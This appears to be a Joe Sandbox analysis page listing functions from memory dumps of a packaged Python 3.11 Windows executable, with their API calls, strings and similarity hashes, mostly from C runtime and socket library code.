Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Long$Err_FromLong_Socketclosesocket$CurrentDuplicateHandleInformationOccurredProcessWindows
String ID:
API String ID: 3394293678-0
Opcode ID: 0edd20fb7986b937f362815becdc3353667b1d2dbe2f27d78ce67fe63332d1ae
Instruction ID: ad00be5cad9e45df2a2f6c8de0e8e73fe68d030d3fdd2fc9dbf71b604055be38
Opcode Fuzzy Hash: 0edd20fb7986b937f362815becdc3353667b1d2dbe2f27d78ce67fe63332d1ae
Instruction Fuzzy Hash: AA212761B19FC281EA655B23A8987B963D0AF46BBCF440775D86E067F4DF3CE84C4640

Function 00007FF6399C55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C55E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C59D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C5C6C

Strings

f, xrefs: 00007FF6399C5705
p, xrefs: 00007FF6399C570D
:, xrefs: 00007FF6399C579C
p, xrefs: 00007FF6399C5695
-, xrefs: 00007FF6399C5679

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction ID: 1a77188b7fd9bdab8d0c7d903cfdf57ba97beebbf34d81613c38d95a47a7877f
Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction Fuzzy Hash: 1F129F62E0C24386FB209E15D9542B97693FB80750FDC4136E689867DEDF3CE990AF06

Function 00007FF6399C02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C0328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C06F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C098F

Strings

f, xrefs: 00007FF6399C042A
p, xrefs: 00007FF6399C0432
f, xrefs: 00007FF6399C0575
f, xrefs: 00007FF6399C03C0
p, xrefs: 00007FF6399C03CD

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction ID: b22143bc2f50c93a94027eabebbc1d648cdc0b5d8ac31c508ef791fd44ae314e
Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction Fuzzy Hash: 1F12AF26E0C14386FF249E14E9147BA6653FB80754F8E4132E699867CEDF3DE980AF10

Function 00007FFE1A4933E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A49357E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A49358B

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A493839
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A493884
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A4938B9

Strings

csm, xrefs: 00007FFE1A4934C5
csm, xrefs: 00007FFE1A493527
csm, xrefs: 00007FFE1A4935A7

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
Instruction ID: 54c069e2a3309f3899f51773558a53de3a11fef69519f374103e940f08a4464f
Opcode Fuzzy Hash: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
Instruction Fuzzy Hash: 76E1A672A08A818AE730DF36D4442BD77A0FB49BA8F1151BADA4E47765CF3CE4A5C700

Function 00007FFDFF19D5C0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

Strings

template-parameter-, xrefs: 00007FFDFF19D68D
`template-parameter-, xrefs: 00007FFDFF19D6C0
generic-type-, xrefs: 00007FFDFF19D6D4
`generic-type-, xrefs: 00007FFDFF19D707

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID:
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 0-3207858774
Opcode ID: 20996663c1b0fb8eb5cc2aad47e9067527360910d4c177074442bd2209240324
Instruction ID: d9fffcab7b75ae346f837029bfb2397bdc49fea9d7597711296468940f2a594e
Opcode Fuzzy Hash: 20996663c1b0fb8eb5cc2aad47e9067527360910d4c177074442bd2209240324
Instruction Fuzzy Hash: E5814C23F08A8A85FB208F65D4609BC37A1AB55788F445235CABD577DEEF2CE645C380

Function 00007FFE1A49C1D8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C38C

Part of subcall function 00007FFE1A498EE4: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A499455
Part of subcall function 00007FFE1A498EE4: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49948A

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C33E

Strings

cli::array<, xrefs: 00007FFE1A49C30B
cli::pin_ptr<, xrefs: 00007FFE1A49C355
void , xrefs: 00007FFE1A49C24A
std::nullptr_t , xrefs: 00007FFE1A49C2CA
std::nullptr_t, xrefs: 00007FFE1A49C2B7
void, xrefs: 00007FFE1A49C222

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
Instruction ID: e634a94a7322399f9f481952ac5f634a310e1cd11226c63a3c49fb2582d3aa83
Opcode Fuzzy Hash: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
Instruction Fuzzy Hash: A4514962F18F958CFB318B62D8412BD37A4BB48B24F4481F6DA4E12AA5DF3CA174C714

Function 00007FF6399B1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6399B10F5
malloc, xrefs: 00007FF6399B10FC
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6399B10C5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6399B1097
fseek, xrefs: 00007FF6399B10CC
fread, xrefs: 00007FF6399B11D7
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6399B11D0

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: d77f4b4c11bc54fdb1d3a5c3642b824366d562c40fb2b64a3717ccc9c60c834d
Instruction ID: 0656befebd02a607eecd6784ab166cc334db0202db01afd324cccb4f319f27e2
Opcode Fuzzy Hash: d77f4b4c11bc54fdb1d3a5c3642b824366d562c40fb2b64a3717ccc9c60c834d
Instruction Fuzzy Hash: 6A414D21B0864782FA249F12A8405BAA3A2FF54BC4F4C4031DD5E87BDBEE3CE545AB40

Function 00007FFDFF19B59C Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B750

Part of subcall function 00007FFDFF1987EC: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198C99
Part of subcall function 00007FFDFF1987EC: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198CD1

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B702

Strings

std::nullptr_t, xrefs: 00007FFDFF19B67B
std::nullptr_t , xrefs: 00007FFDFF19B68E
cli::pin_ptr<, xrefs: 00007FFDFF19B719
cli::array<, xrefs: 00007FFDFF19B6CF
void, xrefs: 00007FFDFF19B5E6
void , xrefs: 00007FFDFF19B60E

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: fd441c011f68102e089b8559749aab68fc751324ec247b824254d2e0013aff5e
Instruction ID: b729102e4fc2fe6e3c269d5782209ae382f577118309f15701ea6d18b8878186
Opcode Fuzzy Hash: fd441c011f68102e089b8559749aab68fc751324ec247b824254d2e0013aff5e
Instruction Fuzzy Hash: 8B513862F08B5988FB25CF60E861ABC37A0BB44748F444235DA7D526EDDF7CA244C790

Function 00007FF6399B7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B800A
GetStartupInfoW.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B802B

Part of subcall function 00007FF6399C978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C97A0

Part of subcall function 00007FF6399C7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C7A93

GetCommandLineW.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B80CD
CreateProcessW.KERNEL32 ref: 00007FF6399B810F
WaitForSingleObject.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B8123
GetExitCodeProcess.KERNEL32 ref: 00007FF6399B8133

Strings

CreateProcessW, xrefs: 00007FF6399B8146
Failed to create child process!, xrefs: 00007FF6399B813F

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: df73f32ea119d9442f90b1cd7416fbf19a59969f838bb2d0beac387528eaafd8
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 74411332A0878281DA209F24F8952AA73A6FF85360F580335E6AD877DADF7CD4449F40

Function 00007FFE14633A8C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83networkthreadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON311 ref: 00007FFE14633AAA
connect.WS2_32 ref: 00007FFE14633ABD
PyEval_RestoreThread.PYTHON311 ref: 00007FFE14633AC8
WSAGetLastError.WS2_32 ref: 00007FFE14633AD6
WSAGetLastError.WS2_32 ref: 00007FFE14633AE2
PyErr_CheckSignals.PYTHON311 ref: 00007FFE14633AEF

Part of subcall function 00007FFE146346BC: WSAGetLastError.WS2_32 ref: 00007FFE14634763
Part of subcall function 00007FFE146346BC: WSAGetLastError.WS2_32 ref: 00007FFE1463476B
Part of subcall function 00007FFE146346BC: PyErr_CheckSignals.PYTHON311 ref: 00007FFE1463477C

WSASetLastError.WS2_32 ref: 00007FFE14633B2C

Strings

3', xrefs: 00007FFE14633B10

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: ErrorLast$CheckErr_Eval_SignalsThread$RestoreSaveconnect
String ID: 3'
API String ID: 1012362816-280543908
Opcode ID: 4c2aaa0c3d8159640696ba06d8d00cbee7b06f13f29e807c9c1db9180f4fbb81
Instruction ID: 93bdc48f83574bdf0d0c64df0d52c995c0c33cf22327f9967a018970c82e6042
Opcode Fuzzy Hash: 4c2aaa0c3d8159640696ba06d8d00cbee7b06f13f29e807c9c1db9180f4fbb81
Instruction Fuzzy Hash: E1313231B08F8286E7549F67A4C42796691AF667B8F0401B5EE4E827B5DE3CE4888680

Function 00007FFE14637974 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49timeCOMMON

Download Yara Rule

APIs

_PyTime_FromSeconds.PYTHON311(?,?,?,00007FFE14636397), ref: 00007FFE1463798B
_PyTime_FromSecondsObject.PYTHON311(?,?,?,00007FFE14636397), ref: 00007FFE146379A2
PyErr_SetString.PYTHON311(?,?,?,00007FFE14636397), ref: 00007FFE146379C5
_PyTime_AsTimeval.PYTHON311(?,?,?,00007FFE14636397), ref: 00007FFE146379E7
_PyTime_AsMilliseconds.PYTHON311(?,?,?,00007FFE14636397), ref: 00007FFE146379FC
PyErr_SetString.PYTHON311(?,?,?,00007FFE14636397), ref: 00007FFE14637A2F

Strings

Timeout value out of range, xrefs: 00007FFE146379BB
timeout doesn't fit into C timeval, xrefs: 00007FFE14637A25

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Time_$Err_FromSecondsString$MillisecondsObjectTimeval
String ID: Timeout value out of range$timeout doesn't fit into C timeval
API String ID: 4240314503-2798848688
Opcode ID: 1a7d23c7c3133ec22ce468f513b0449c0fe3c53df5359948a482d87bcc896e03
Instruction ID: 502eeea200505756dd182389452e1ed02c98ff2e78b6a3254c2b4f88a61ecbbe
Opcode Fuzzy Hash: 1a7d23c7c3133ec22ce468f513b0449c0fe3c53df5359948a482d87bcc896e03
Instruction Fuzzy Hash: 0911EF26B18E8282EB509B27E8C017923A1EF86779F045671D96D477F4DF3CE4498340

Function 00007FFE14637598 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 29stringCOMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE146375AB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE146375C1
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FFE146375DC
inet_addr.WS2_32 ref: 00007FFE146375EC
PyErr_SetString.PYTHON311 ref: 00007FFE1463760C

Strings

illegal IP address string passed to inet_aton, xrefs: 00007FFE14637602
255.255.255.255, xrefs: 00007FFE146375BA
s:inet_aton, xrefs: 00007FFE146375A4

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: SizeString$Arg_Bytes_Err_FromParseTuple_inet_addrstrcmp
String ID: 255.255.255.255$illegal IP address string passed to inet_aton$s:inet_aton
API String ID: 717551241-4110412280
Opcode ID: 437e0f5accdcc4c445e21ebdedb649c9d251ef100eda094add99a45a15582bd2
Instruction ID: 3e3dce5d14008066187ca29aecd78430a0f83b8ab2ce936de71a0a176d0f5892
Opcode Fuzzy Hash: 437e0f5accdcc4c445e21ebdedb649c9d251ef100eda094add99a45a15582bd2
Instruction Fuzzy Hash: 1201DE61A08D8381EA109B27E8D01B923A0EF867B9F505572E65E867B8DF3CD84DD780

Function 00007FFDFF167E74 Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF168124: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF168144
Part of subcall function 00007FFDFF168124: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF16819A
Part of subcall function 00007FFDFF168124: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF16823F

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF167F51
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF167F6F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF168105
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF1ACB42
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFDFF1ACB75

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: CriticalSection$EnterErrorFileLast$CloseCreateHandleLeaveType
String ID:
API String ID: 3788438030-0
Opcode ID: 59afad09f3772062d551bc9d13e2e6998e9d18d203afc9e7224b3c8b9d463327
Instruction ID: 8ff47c4b14692bfc12cc0707b126013d0bad3864ed08c80ba8b1e060d260abc8
Opcode Fuzzy Hash: 59afad09f3772062d551bc9d13e2e6998e9d18d203afc9e7224b3c8b9d463327
Instruction Fuzzy Hash: 8FC19F37B28A4189EB10CF68C4A09BC3761EB89BA8B145335DA7E977D9CF39D155C300

Function 00007FFDFF168670 Relevance: 13.6, APIs: 9, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF16867F
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF16868D
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686A1
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686BB
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686CD
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686F3
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF168719
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF168742
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1AD001

Part of subcall function 00007FFDFF162070: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF15F368,?,?,?), ref: 00007FFDFF162085

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast$FreeHeap
String ID:
API String ID: 3324550332-0
Opcode ID: a76e68ed05aa8e8fb4d94b576f9e68516680051c4dd2ab0895be77a39d6bb4c5
Instruction ID: edd0f0ffb9dbb013a68735f799f67458ae8e62c85d6dcae357030fad7051e4a7
Opcode Fuzzy Hash: a76e68ed05aa8e8fb4d94b576f9e68516680051c4dd2ab0895be77a39d6bb4c5
Instruction Fuzzy Hash: 77212C26F0DA4386FB589B35A874D392351AF89BB0F044334D43E867EEDF2CA5418704

Function 00007FF6399BDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6399BDD85

Part of subcall function 00007FF6399BECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6399BED1F
Part of subcall function 00007FF6399BECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6399BED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6399BDE5D
